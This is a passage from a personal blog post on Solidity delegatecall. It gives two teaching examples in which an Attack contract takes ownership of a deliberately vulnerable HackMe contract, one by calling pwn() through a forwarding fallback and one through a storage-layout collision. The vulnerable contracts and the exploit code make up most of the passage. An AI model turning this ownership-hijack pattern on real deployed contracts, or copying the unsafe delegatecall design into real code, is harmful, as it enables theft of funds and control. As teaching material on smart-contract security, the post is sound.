<p>delegatecalls preserves context</p>

<p>example:</p>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">What</span> <span class="n">happened</span><span class="o">?</span>
<span class="n">Eve</span> <span class="n">called</span> <span class="n">Attack</span><span class="p">.</span><span class="n">attack</span><span class="p">().</span>
<span class="n">Attack</span> <span class="n">called</span> <span class="n">the</span> <span class="k">fallback</span> <span class="k">function</span> <span class="kr">of</span> <span class="n">HackMe</span> <span class="n">sending</span> <span class="n">the</span> <span class="k">function</span>
<span class="nb">selector</span> <span class="kr">of</span> <span class="n">pwn</span><span class="p">().</span> <span class="n">HackMe</span> <span class="n">forwards</span> <span class="n">the</span> <span class="nb">call</span> <span class="n">to</span> <span class="n">Lib</span> <span class="k">using</span> <span class="nb">delegatecall</span><span class="p">.</span>
<span class="n">Here</span> <span class="n">msg</span><span class="p">.</span><span class="n">data</span> <span class="n">contains</span> <span class="n">the</span> <span class="k">function</span> <span class="nb">selector</span> <span class="kr">of</span> <span class="n">pwn</span><span class="p">().</span>
<span class="n">This</span> <span class="n">tells</span> <span class="n">Solidity</span> <span class="n">to</span> <span class="nb">call</span> <span class="n">the</span> <span class="k">function</span> <span class="n">pwn</span><span class="p">()</span> <span class="n">inside</span> <span class="n">Lib</span><span class="p">.</span>
<span class="n">The</span> <span class="k">function</span> <span class="n">pwn</span><span class="p">()</span> <span class="n">updates</span> <span class="n">the</span> <span class="n">owner</span> <span class="n">to</span> <span class="n">msg</span><span class="p">.</span><span class="n">sender</span><span class="p">.</span>
<span class="n">Delegatecall</span> <span class="n">runs</span> <span class="n">the</span> <span class="n">code</span> <span class="kr">of</span> <span class="n">Lib</span> <span class="k">using</span> <span class="n">the</span> <span class="n">context</span> <span class="kr">of</span> <span class="n">HackMe</span><span class="p">.</span>
<span class="n">Therefore</span> <span class="n">HackMe</span><span class="s">'s storage was updated to msg.sender where msg.sender is the</span><span class="err">
</span><span class="s">caller of HackMe, in this case Attack.</span><span class="err">
</span><span class="s">*/</span><span class="err">

</span><span class="s">contract Lib {</span><span class="err">
</span><span class="s">    address public owner;</span><span class="err">

</span><span class="s">    function pwn() public {</span><span class="err">
</span><span class="s">        owner = msg.sender;</span><span class="err">
</span><span class="s">    }</span><span class="err">
</span><span class="s">}</span><span class="err">

</span><span class="s">contract HackMe {</span><span class="err">
</span><span class="s">    address public owner;</span><span class="err">
</span><span class="s">    Lib public lib;</span><span class="err">

</span><span class="s">    constructor(Lib _lib) {</span><span class="err">
</span><span class="s">        owner = msg.sender;</span><span class="err">
</span><span class="s">        lib = Lib(_lib);</span><span class="err">
</span><span class="s">    }</span><span class="err">

</span><span class="s">    fallback() external payable {</span><span class="err">
</span><span class="s">        address(lib).delegatecall(msg.data);</span><span class="err">
</span><span class="s">    }</span><span class="err">
</span><span class="s">}</span><span class="err">

</span><span class="s">contract Attack {</span><span class="err">
</span><span class="s">    address public hackMe;</span><span class="err">

</span><span class="s">    constructor(address _hackMe) {</span><span class="err">
</span><span class="s">        hackMe = _hackMe;</span><span class="err">
</span><span class="s">    }</span><span class="err">

</span><span class="s">    function attack() public {</span><span class="err">
</span><span class="s">        hackMe.call(abi.encodeWithSignature("pwn()"));</span><span class="err">
</span><span class="s">    }</span><span class="err">
</span><span class="s">}</span><span class="err">

</span></code></pre></div></div>

<p>Another slightly more sophisticated example</p>

<div class="language-solidity highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="c1">// SPDX-License-Identifier: MIT
</span><span class="k">pragma</span> <span class="n">solidity</span> <span class="o">^</span><span class="mf">0.8</span><span class="p">.</span><span class="mi">13</span><span class="p">;</span>

<span class="cm">/*
This is a more sophisticated version of the previous exploit.

1. Alice deploys Lib and HackMe with the address of Lib
2. Eve deploys Attack with the address of HackMe
3. Eve calls Attack.attack()
4. Attack is now the owner of HackMe

What happened?
Notice that the state variables are not defined in the same manner in Lib
and HackMe. This means that calling Lib.doSomething() will change the first
state variable inside HackMe, which happens to be the address of lib.

Inside attack(), the first call to doSomething() changes the address of lib
store in HackMe. Address of lib is now set to Attack.
The second call to doSomething() calls Attack.doSomething() and here we
change the owner.
*/</span>

<span class="k">contract</span> <span class="n">Lib</span> <span class="p">{</span>
    <span class="kt">uint</span> <span class="k">public</span> <span class="n">someNumber</span><span class="p">;</span>

    <span class="k">function</span> <span class="n">doSomething</span><span class="p">(</span><span class="kt">uint</span> <span class="n">_num</span><span class="p">)</span> <span class="k">public</span> <span class="p">{</span>
        <span class="n">someNumber</span> <span class="o">=</span> <span class="n">_num</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">contract</span> <span class="n">HackMe</span> <span class="p">{</span>
    <span class="kt">address</span> <span class="k">public</span> <span class="n">lib</span><span class="p">;</span>
    <span class="kt">address</span> <span class="k">public</span> <span class="n">owner</span><span class="p">;</span>
    <span class="kt">uint</span> <span class="k">public</span> <span class="n">someNumber</span><span class="p">;</span>

    <span class="k">constructor</span><span class="p">(</span><span class="kt">address</span> <span class="n">_lib</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">lib</span> <span class="o">=</span> <span class="n">_lib</span><span class="p">;</span>
        <span class="n">owner</span> <span class="o">=</span> <span class="n">msg</span><span class="p">.</span><span class="n">sender</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">function</span> <span class="n">doSomething</span><span class="p">(</span><span class="kt">uint</span> <span class="n">_num</span><span class="p">)</span> <span class="k">public</span> <span class="p">{</span>
        <span class="n">lib</span><span class="p">.</span><span class="nb">delegatecall</span><span class="p">(</span><span class="n">abi</span><span class="p">.</span><span class="n">encodeWithSignature</span><span class="p">(</span><span class="s">"doSomething(uint256)"</span><span class="p">,</span> <span class="n">_num</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">contract</span> <span class="n">Attack</span> <span class="p">{</span>
    <span class="c1">// Make sure the storage layout is the same as HackMe
</span>    <span class="c1">// This will allow us to correctly update the state variables
</span>    <span class="kt">address</span> <span class="k">public</span> <span class="n">lib</span><span class="p">;</span>
    <span class="kt">address</span> <span class="k">public</span> <span class="n">owner</span><span class="p">;</span>
    <span class="kt">uint</span> <span class="k">public</span> <span class="n">someNumber</span><span class="p">;</span>

    <span class="n">HackMe</span> <span class="k">public</span> <span class="n">hackMe</span><span class="p">;</span>

    <span class="k">constructor</span><span class="p">(</span><span class="n">HackMe</span> <span class="n">_hackMe</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">hackMe</span> <span class="o">=</span> <span class="n">HackMe</span><span class="p">(</span><span class="n">_hackMe</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">function</span> <span class="n">attack</span><span class="p">()</span> <span class="k">public</span> <span class="p">{</span>
        <span class="c1">// override address of lib
</span>        <span class="n">hackMe</span><span class="p">.</span><span class="n">doSomething</span><span class="p">(</span><span class="kt">uint</span><span class="p">(</span><span class="kt">uint160</span><span class="p">(</span><span class="kt">address</span><span class="p">(</span><span class="nb">this</span><span class="p">))));</span>
        <span class="c1">// pass any number as input, the function doSomething() below will
</span>        <span class="c1">// be called
</span>        <span class="n">hackMe</span><span class="p">.</span><span class="n">doSomething</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// function signature must match HackMe.doSomething()
</span>    <span class="k">function</span> <span class="n">doSomething</span><span class="p">(</span><span class="kt">uint</span> <span class="n">_num</span><span class="p">)</span> <span class="k">public</span> <span class="p">{</span>
        <span class="n">owner</span> <span class="o">=</span> <span class="n">msg</span><span class="p">.</span><span class="n">sender</span><span class="p">;</span>
    <span class="p">}</span>
<span class="p">}</span>


</code></pre></div></div>

  </div><!-- from https://github.com/utterance/utterances -->
<script src="https://utteranc.es/client.js"
        repo="saxenism/saxenism-expressions"
        issue-term="title"
        label="blogpost-comment"
        theme="github-dark"
        crossorigin="anonymous"
        async>
</script><div id="disqus_thread"></div>
  <script>
    var disqus_config = function () {
      this.page.url = 'https://saxenism.com/web3/solidity/solidity-by-example/language-tricks/beginner/2022/03/09/Mental-Hooks-SBE.html';
      this.page.identifier = 'https://saxenism.com/web3/solidity/solidity-by-example/language-tricks/beginner/2022/03/09/Mental-Hooks-SBE.html';
    };

    (function() {
      var d = document, s = d.createElement('script');

      s.src = 'https://.disqus.com/embed.js';

      s.setAttribute('data-timestamp', +new Date());
      (d.head || d.body).appendChild(s);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript><a class="u-url" href="/web3/solidity/solidity-by-example/language-tricks/beginner/2022/03/09/Mental-Hooks-SBE.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <div class="footer-col-wrapper">
      <div class="footer-col">
        <p class="feed-subscribe">
          <a href="/feed.xml">
            <svg class="svg-icon orange">
              <use xlink:href="/assets/minima-social-icons.svg#rss"></use>
            </svg><span>Subscribe</span>
          </a>
        </p>
      </div>
      <div class="footer-col">
        <p>Personal website of Rahul Saxena, containing his thoughts about web3, EVM and a decentralised world.</p>
      </div>
    </div>

    <div class="social-links"><ul class="social-media-list"><li><a rel="me" href="https://github.com/saxenism" target="_blank" title="saxenism"><svg class="svg-icon grey"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg></a></li><li><a rel="me" href="https://twitter.com/saxenism" target="_blank" title="saxenism"><svg class="svg-icon grey"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg></a></li></ul>
</div>

  </div>

</footer>
</body>

</html>
